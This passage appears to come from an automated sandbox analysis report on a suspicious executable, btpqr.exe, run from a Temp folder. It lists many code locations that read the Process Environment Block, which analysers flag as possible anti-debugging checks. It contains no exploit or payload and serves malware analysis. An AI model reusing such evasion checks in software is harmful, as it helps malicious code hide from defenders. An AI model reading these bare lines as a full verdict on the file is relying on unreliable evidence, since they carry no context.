            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE6500 mov eax, dword ptr fs:[00000030h]4_2_00BE6500
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24500 mov eax, dword ptr fs:[00000030h]4_2_00C24500
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24500 mov eax, dword ptr fs:[00000030h]4_2_00C24500
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24500 mov eax, dword ptr fs:[00000030h]4_2_00C24500
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24500 mov eax, dword ptr fs:[00000030h]4_2_00C24500
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24500 mov eax, dword ptr fs:[00000030h]4_2_00C24500
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24500 mov eax, dword ptr fs:[00000030h]4_2_00C24500
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24500 mov eax, dword ptr fs:[00000030h]4_2_00C24500
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8656A mov eax, dword ptr fs:[00000030h]4_2_00B8656A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8656A mov eax, dword ptr fs:[00000030h]4_2_00B8656A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8656A mov eax, dword ptr fs:[00000030h]4_2_00B8656A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B58550 mov eax, dword ptr fs:[00000030h]4_2_00B58550
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B58550 mov eax, dword ptr fs:[00000030h]4_2_00B58550
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B866B0 mov eax, dword ptr fs:[00000030h]4_2_00B866B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C6A6 mov eax, dword ptr fs:[00000030h]4_2_00B8C6A6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54690 mov eax, dword ptr fs:[00000030h]4_2_00B54690
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54690 mov eax, dword ptr fs:[00000030h]4_2_00B54690
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD06F1 mov eax, dword ptr fs:[00000030h]4_2_00BD06F1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD06F1 mov eax, dword ptr fs:[00000030h]4_2_00BD06F1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE6F2 mov eax, dword ptr fs:[00000030h]4_2_00BCE6F2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE6F2 mov eax, dword ptr fs:[00000030h]4_2_00BCE6F2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE6F2 mov eax, dword ptr fs:[00000030h]4_2_00BCE6F2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE6F2 mov eax, dword ptr fs:[00000030h]4_2_00BCE6F2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A6C7 mov ebx, dword ptr fs:[00000030h]4_2_00B8A6C7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A6C7 mov eax, dword ptr fs:[00000030h]4_2_00B8A6C7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E627 mov eax, dword ptr fs:[00000030h]4_2_00B6E627
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B86620 mov eax, dword ptr fs:[00000030h]4_2_00B86620
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B88620 mov eax, dword ptr fs:[00000030h]4_2_00B88620
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5262C mov eax, dword ptr fs:[00000030h]4_2_00B5262C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92619 mov eax, dword ptr fs:[00000030h]4_2_00B92619
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1866E mov eax, dword ptr fs:[00000030h]4_2_00C1866E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1866E mov eax, dword ptr fs:[00000030h]4_2_00C1866E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE609 mov eax, dword ptr fs:[00000030h]4_2_00BCE609
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6260B mov eax, dword ptr fs:[00000030h]4_2_00B6260B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6260B mov eax, dword ptr fs:[00000030h]4_2_00B6260B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6260B mov eax, dword ptr fs:[00000030h]4_2_00B6260B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6260B mov eax, dword ptr fs:[00000030h]4_2_00B6260B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6260B mov eax, dword ptr fs:[00000030h]4_2_00B6260B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6260B mov eax, dword ptr fs:[00000030h]4_2_00B6260B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6260B mov eax, dword ptr fs:[00000030h]4_2_00B6260B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B82674 mov eax, dword ptr fs:[00000030h]4_2_00B82674
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A660 mov eax, dword ptr fs:[00000030h]4_2_00B8A660
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A660 mov eax, dword ptr fs:[00000030h]4_2_00B8A660
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6C640 mov eax, dword ptr fs:[00000030h]4_2_00B6C640
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B507AF mov eax, dword ptr fs:[00000030h]4_2_00B507AF
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF678E mov eax, dword ptr fs:[00000030h]4_2_00BF678E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B547FB mov eax, dword ptr fs:[00000030h]4_2_00B547FB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B547FB mov eax, dword ptr fs:[00000030h]4_2_00B547FB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B727ED mov eax, dword ptr fs:[00000030h]4_2_00B727ED
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B727ED mov eax, dword ptr fs:[00000030h]4_2_00B727ED
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B727ED mov eax, dword ptr fs:[00000030h]4_2_00B727ED
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDE7E1 mov eax, dword ptr fs:[00000030h]4_2_00BDE7E1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C047A0 mov eax, dword ptr fs:[00000030h]4_2_00C047A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5C7C0 mov eax, dword ptr fs:[00000030h]4_2_00B5C7C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD07C3 mov eax, dword ptr fs:[00000030h]4_2_00BD07C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8273C mov eax, dword ptr fs:[00000030h]4_2_00B8273C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8273C mov ecx, dword ptr fs:[00000030h]4_2_00B8273C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8273C mov eax, dword ptr fs:[00000030h]4_2_00B8273C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCC730 mov eax, dword ptr fs:[00000030h]4_2_00BCC730
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C720 mov eax, dword ptr fs:[00000030h]4_2_00B8C720
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C720 mov eax, dword ptr fs:[00000030h]4_2_00B8C720
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B50710 mov eax, dword ptr fs:[00000030h]4_2_00B50710
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B80710 mov eax, dword ptr fs:[00000030h]4_2_00B80710
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C700 mov eax, dword ptr fs:[00000030h]4_2_00B8C700
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B58770 mov eax, dword ptr fs:[00000030h]4_2_00B58770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60770 mov eax, dword ptr fs:[00000030h]4_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDE75D mov eax, dword ptr fs:[00000030h]4_2_00BDE75D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B50750 mov eax, dword ptr fs:[00000030h]4_2_00B50750
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD4755 mov eax, dword ptr fs:[00000030h]4_2_00BD4755
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92750 mov eax, dword ptr fs:[00000030h]4_2_00B92750
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92750 mov eax, dword ptr fs:[00000030h]4_2_00B92750
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8674D mov esi, dword ptr fs:[00000030h]4_2_00B8674D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8674D mov eax, dword ptr fs:[00000030h]4_2_00B8674D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8674D mov eax, dword ptr fs:[00000030h]4_2_00B8674D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C208C0 mov eax, dword ptr fs:[00000030h]4_2_00C208C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDC89D mov eax, dword ptr fs:[00000030h]4_2_00BDC89D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1A8E4 mov eax, dword ptr fs:[00000030h]4_2_00C1A8E4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B50887 mov eax, dword ptr fs:[00000030h]4_2_00B50887
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C8F9 mov eax, dword ptr fs:[00000030h]4_2_00B8C8F9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C8F9 mov eax, dword ptr fs:[00000030h]4_2_00B8C8F9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E8C0 mov eax, dword ptr fs:[00000030h]4_2_00B7E8C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B72835 mov eax, dword ptr fs:[00000030h]4_2_00B72835
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B72835 mov eax, dword ptr fs:[00000030h]4_2_00B72835
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B72835 mov eax, dword ptr fs:[00000030h]4_2_00B72835
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B72835 mov ecx, dword ptr fs:[00000030h]4_2_00B72835
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B72835 mov eax, dword ptr fs:[00000030h]4_2_00B72835
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B72835 mov eax, dword ptr fs:[00000030h]4_2_00B72835
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF483A mov eax, dword ptr fs:[00000030h]4_2_00BF483A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF483A mov eax, dword ptr fs:[00000030h]4_2_00BF483A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A830 mov eax, dword ptr fs:[00000030h]4_2_00B8A830
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDC810 mov eax, dword ptr fs:[00000030h]4_2_00BDC810
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE6870 mov eax, dword ptr fs:[00000030h]4_2_00BE6870
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE6870 mov eax, dword ptr fs:[00000030h]4_2_00BE6870
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDE872 mov eax, dword ptr fs:[00000030h]4_2_00BDE872
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDE872 mov eax, dword ptr fs:[00000030h]4_2_00BDE872
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B80854 mov eax, dword ptr fs:[00000030h]4_2_00B80854
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54859 mov eax, dword ptr fs:[00000030h]4_2_00B54859
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54859 mov eax, dword ptr fs:[00000030h]4_2_00B54859
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B62840 mov ecx, dword ptr fs:[00000030h]4_2_00B62840
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD89B3 mov esi, dword ptr fs:[00000030h]4_2_00BD89B3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD89B3 mov eax, dword ptr fs:[00000030h]4_2_00BD89B3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD89B3 mov eax, dword ptr fs:[00000030h]4_2_00BD89B3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1A9D3 mov eax, dword ptr fs:[00000030h]4_2_00C1A9D3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A0 mov eax, dword ptr fs:[00000030h]4_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B509AD mov eax, dword ptr fs:[00000030h]4_2_00B509AD
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B509AD mov eax, dword ptr fs:[00000030h]4_2_00B509AD
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B829F9 mov eax, dword ptr fs:[00000030h]4_2_00B829F9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B829F9 mov eax, dword ptr fs:[00000030h]4_2_00B829F9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDE9E0 mov eax, dword ptr fs:[00000030h]4_2_00BDE9E0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A9D0 mov eax, dword ptr fs:[00000030h]4_2_00B5A9D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A9D0 mov eax, dword ptr fs:[00000030h]4_2_00B5A9D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A9D0 mov eax, dword ptr fs:[00000030h]4_2_00B5A9D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A9D0 mov eax, dword ptr fs:[00000030h]4_2_00B5A9D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A9D0 mov eax, dword ptr fs:[00000030h]4_2_00B5A9D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A9D0 mov eax, dword ptr fs:[00000030h]4_2_00B5A9D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B849D0 mov eax, dword ptr fs:[00000030h]4_2_00B849D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE69C0 mov eax, dword ptr fs:[00000030h]4_2_00BE69C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24940 mov eax, dword ptr fs:[00000030h]4_2_00C24940
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE892B mov eax, dword ptr fs:[00000030h]4_2_00BE892B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD892A mov eax, dword ptr fs:[00000030h]4_2_00BD892A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B48918 mov eax, dword ptr fs:[00000030h]4_2_00B48918
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B48918 mov eax, dword ptr fs:[00000030h]4_2_00B48918
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDC912 mov eax, dword ptr fs:[00000030h]4_2_00BDC912
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE908 mov eax, dword ptr fs:[00000030h]4_2_00BCE908
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE908 mov eax, dword ptr fs:[00000030h]4_2_00BCE908
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDC97C mov eax, dword ptr fs:[00000030h]4_2_00BDC97C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF4978 mov eax, dword ptr fs:[00000030h]4_2_00BF4978
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF4978 mov eax, dword ptr fs:[00000030h]4_2_00BF4978
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B76962 mov eax, dword ptr fs:[00000030h]4_2_00B76962
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B76962 mov eax, dword ptr fs:[00000030h]4_2_00B76962
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B76962 mov eax, dword ptr fs:[00000030h]4_2_00B76962
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9096E mov eax, dword ptr fs:[00000030h]4_2_00B9096E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9096E mov edx, dword ptr fs:[00000030h]4_2_00B9096E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9096E mov eax, dword ptr fs:[00000030h]4_2_00B9096E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD0946 mov eax, dword ptr fs:[00000030h]4_2_00BD0946
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B58AA0 mov eax, dword ptr fs:[00000030h]4_2_00B58AA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B58AA0 mov eax, dword ptr fs:[00000030h]4_2_00B58AA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BA6AA4 mov eax, dword ptr fs:[00000030h]4_2_00BA6AA4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B88A90 mov edx, dword ptr fs:[00000030h]4_2_00B88A90
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA80 mov eax, dword ptr fs:[00000030h]4_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24A80 mov eax, dword ptr fs:[00000030h]4_2_00C24A80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8AAEE mov eax, dword ptr fs:[00000030h]4_2_00B8AAEE
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8AAEE mov eax, dword ptr fs:[00000030h]4_2_00B8AAEE
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B50AD0 mov eax, dword ptr fs:[00000030h]4_2_00B50AD0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B84AD0 mov eax, dword ptr fs:[00000030h]4_2_00B84AD0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B84AD0 mov eax, dword ptr fs:[00000030h]4_2_00B84AD0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BA6ACC mov eax, dword ptr fs:[00000030h]4_2_00BA6ACC
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BA6ACC mov eax, dword ptr fs:[00000030h]4_2_00BA6ACC
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BA6ACC mov eax, dword ptr fs:[00000030h]4_2_00BA6ACC
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8CA38 mov eax, dword ptr fs:[00000030h]4_2_00B8CA38
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B74A35 mov eax, dword ptr fs:[00000030h]4_2_00B74A35
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B74A35 mov eax, dword ptr fs:[00000030h]4_2_00B74A35
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7EA2E mov eax, dword ptr fs:[00000030h]4_2_00B7EA2E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8CA24 mov eax, dword ptr fs:[00000030h]4_2_00B8CA24
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDCA11 mov eax, dword ptr fs:[00000030h]4_2_00BDCA11
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCCA72 mov eax, dword ptr fs:[00000030h]4_2_00BCCA72
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCCA72 mov eax, dword ptr fs:[00000030h]4_2_00BCCA72
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8CA6F mov eax, dword ptr fs:[00000030h]4_2_00B8CA6F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8CA6F mov eax, dword ptr fs:[00000030h]4_2_00B8CA6F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8CA6F mov eax, dword ptr fs:[00000030h]4_2_00B8CA6F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFEA60 mov eax, dword ptr fs:[00000030h]4_2_00BFEA60
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56A50 mov eax, dword ptr fs:[00000030h]4_2_00B56A50
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56A50 mov eax, dword ptr fs:[00000030h]4_2_00B56A50
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56A50 mov eax, dword ptr fs:[00000030h]4_2_00B56A50
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56A50 mov eax, dword ptr fs:[00000030h]4_2_00B56A50
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56A50 mov eax, dword ptr fs:[00000030h]4_2_00B56A50
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56A50 mov eax, dword ptr fs:[00000030h]4_2_00B56A50
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56A50 mov eax, dword ptr fs:[00000030h]4_2_00B56A50
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60A5B mov eax, dword ptr fs:[00000030h]4_2_00B60A5B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60A5B mov eax, dword ptr fs:[00000030h]4_2_00B60A5B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60BBE mov eax, dword ptr fs:[00000030h]4_2_00B60BBE
